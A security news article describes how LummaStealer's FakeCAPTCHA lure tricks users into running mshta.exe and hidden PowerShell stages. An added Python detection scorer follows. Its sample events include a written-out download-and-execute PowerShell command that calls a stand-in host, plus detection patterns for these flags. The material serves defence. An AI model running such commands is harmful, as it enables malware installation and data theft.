LummaStealer Malware Pairs Deceptive CAPTCHAs With Self-Infection to Harvest Sensitive Data
Cybercriminals are combining LummaStealer malware with fake CAPTCHA prompts to steal data. The method pairs social engineering with a lightweight payload to get past traditional security controls: victims are tricked into running malicious code themselves, exposing browser credentials, cryptocurrency wallets and other sensitive information. 2025-05-02 07:08:16 Author: cybersecuritynews.com (view original)

LummaStealer’s FakeCAPTCHA Steals Browser Credentials Via Weaponized Microsoft Word Files

Cybercriminals have refined their attack methodologies with a sophisticated campaign leveraging LummaStealer malware and deceptive CAPTCHA prompts to harvest sensitive data.

This social engineering approach combines psychological manipulation with lightweight payload delivery, enabling threat actors to bypass traditional security controls while scaling their operations.

The malware, which targets browser credentials, cryptocurrency wallets, and system information, represents an evolving threat in the cybersecurity landscape.


LummaStealer, also known as LummaC2, has been active since 2022 when it first appeared on underground forums under the name “7.62mm Stealer.”

Operating as a Malware-as-a-Service platform, LummaStealer enables cybercriminals of varying technical capabilities to deploy sophisticated attacks against unsuspecting victims.

Early campaigns typically delivered payloads through malicious HTML attachments disguised as Microsoft Word files, but recent variants have adopted more deceptive tactics.

Binary Defense researchers have identified a concerning trend in which LummaStealer operators employ a technique called FakeCAPTCHA to trick users into running the malicious code themselves.

According to analysis from the ARC Labs team, this delivery method relies on no software exploit at all; it abuses native Windows utilities (mshta.exe and powershell.exe, signed binaries already present on every workstation) so that the early stages look like ordinary system activity to endpoint detection.

The approach demonstrates how threat actors continue to evolve their techniques to maximize success rates while minimizing detection.

The impact of LummaStealer extends beyond individual users to potentially affect organizations of all sizes.

Once infected, victim systems have their credentials, cryptocurrency wallets, and other sensitive information exfiltrated to command-and-control servers.

This data can be used for financial fraud, account takeovers, and as stepping stones for more extensive network compromises.

Infection Chain Technical Analysis

The FakeCAPTCHA technique presents victims with what appears to be a standard human verification challenge, typically displaying a “Verification Failed – Network Error” or “Human Verification” message.

Rather than clicking on images or typing text, users are instructed to perform a series of actions: press Windows+R to open the Run dialog, paste (Ctrl+V) a command that the page has silently placed on their clipboard, and press Enter.

This user-initiated action launches mshta.exe with a remote URL. mshta.exe fetches a file served with an .mp4 extension which, although it looks like a video, is actually script content, and runs it.

That script launches a further PowerShell command which retrieves a file named web.png; despite its extension, this is not an image but the actual LummaC2 payload.

Throughout the chain, PowerShell pulls the remote payloads with the .NET System.Net.WebClient class (instantiated as New-Object Net.WebClient and called via DownloadString or DownloadFile), and the PowerShell processes are started with -WindowStyle Hidden, which suppresses the console window, and -ExecutionPolicy Bypass, which disables the script execution policy check, so nothing visible appears on screen after the victim presses Enter.

FakeCAPTCHA infection flow (Source – Binary Defense)

The infection flow shows that users are manipulated into starting a multi-stage attack chain in which every stage hides behind an innocuous-looking file type (.mp4, .png), and nothing executes until the victim pastes and runs the command.

Security professionals should monitor PowerShell command lines and script blocks (Windows Event ID 4688 with command-line auditing, Sysmon Event ID 1, and PowerShell Script Block Logging Event ID 4104) for Net.WebClient usage, especially when the parent process is an unexpected one such as mshta.exe or when the -WindowStyle Hidden and -ExecutionPolicy Bypass flags are present.

Additionally, mshta.exe initiating external network connections is anomalous on most endpoints and worth alerting on in its own right. Commands entered into the Run dialog are also recorded in the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), so correlating that artifact with clipboard activity and a subsequent mshta.exe launch gives incident responders a way to confirm a FakeCAPTCHA lure after the fact.
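The following scorer is an added example, not code from the article or from Binary Defense. It applies the monitoring advice above, and the parent/child and flag combinations from the chain described under “Infection Chain Technical Analysis”, to a handful of constructed process-creation events. The field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample command lines, the example.invalid hostnames and the indicator weights are assumptions chosen for illustration, and treating wscript.exe and cscript.exe as suspicious PowerShell parents goes slightly beyond what the page documents.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# These are illustrative, not telemetry from the campaign; example.invalid is a reserved TLD.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # stage 1: mshta.exe pulling a remote ".mp4" that is really script content
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"mshta https://example.invalid/video.mp4",
    },
    {   # stage 2: hidden PowerShell spawned by mshta.exe, fetching the ".png" payload
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'''powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/web.png')"''',
    },
    {   # benign interactive use: should not score at all
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell -NoProfile -Command Get-Process",
    },
    {   # admin tooling that also uses WebClient: stays below the alert threshold on its own
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
        "CommandLine": r'''powershell -Command "(New-Object Net.WebClient).DownloadFile('https://example.invalid/agent.zip', 'C:\Temp\agent.zip')"''',
    },
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Parents that should rarely spawn PowerShell on a workstation. mshta.exe is the one the
# page documents; the two script hosts are an added generalisation (assumption).
SUSPICIOUS_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://", re.I)

# name -> (regex, weight). Flags are matched loosely because powershell.exe accepts any
# unambiguous prefix of a parameter name (-w / -win / -WindowStyle, -ep / -exec / -ExecutionPolicy).
INDICATORS: Dict[str, Tuple[re.Pattern, int]] = {
    "Net.WebClient download": (re.compile(r"net\.webclient|\.download(?:string|file|data)\(", re.I), 2),
    "hidden window (-WindowStyle Hidden)": (re.compile(r"-w[a-z]*\s+(?:h[a-z]*|1)\b", re.I), 1),
    "execution policy bypass": (re.compile(r"-e[a-z]*\s+(?:bypass|unrestricted)\b", re.I), 1),
    "Invoke-Expression of fetched content": (re.compile(r"\biex\b|invoke-expression", re.I), 1),
}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one process-creation event."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    score, reasons = 0, []

    # mshta.exe given a URL: it will fetch and execute remote script content.
    if image == "mshta.exe" and URL_RE.search(cmd):
        score += 3
        reasons.append("mshta.exe launched with a remote URL")

    if image in POWERSHELL:
        # The parent process is the strongest single signal in this chain.
        if parent in SUSPICIOUS_PARENTS:
            score += 4
            reasons.append(f"powershell spawned by {parent}")
        for name, (rx, weight) in INDICATORS.items():
            if rx.search(cmd):
                score += weight
                reasons.append(name)
    return score, reasons


def detect(events: List[Dict[str, str]], threshold: int = 3) -> List[dict]:
    """Score every event and return those at or above the threshold, highest first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"score": score, "reasons": reasons, "event": ev})
    hits.sort(key=lambda h: h["score"], reverse=True)
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        ev = hit["event"]
        print(f"[score {hit['score']}] {_basename(ev['ParentImage'])} -> {_basename(ev['Image'])}")
        for reason in hit["reasons"]:
            print("    -", reason)
```

Run against the constructed events, the mshta.exe stage and the hidden PowerShell child are reported and the two legitimate PowerShell launches are not. Note that Net.WebClient on its own is deliberately weighted below the threshold: in managed environments deployment agents use it constantly, so it is the combination with an odd parent and the hidden/bypass flags that should drive an alert. To use this on real data, map your Sysmon or 4688 fields onto the three keys the scorer reads.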



Source: https://cybersecuritynews.com/lummastealers-fakecaptcha-steals-browser-credentials/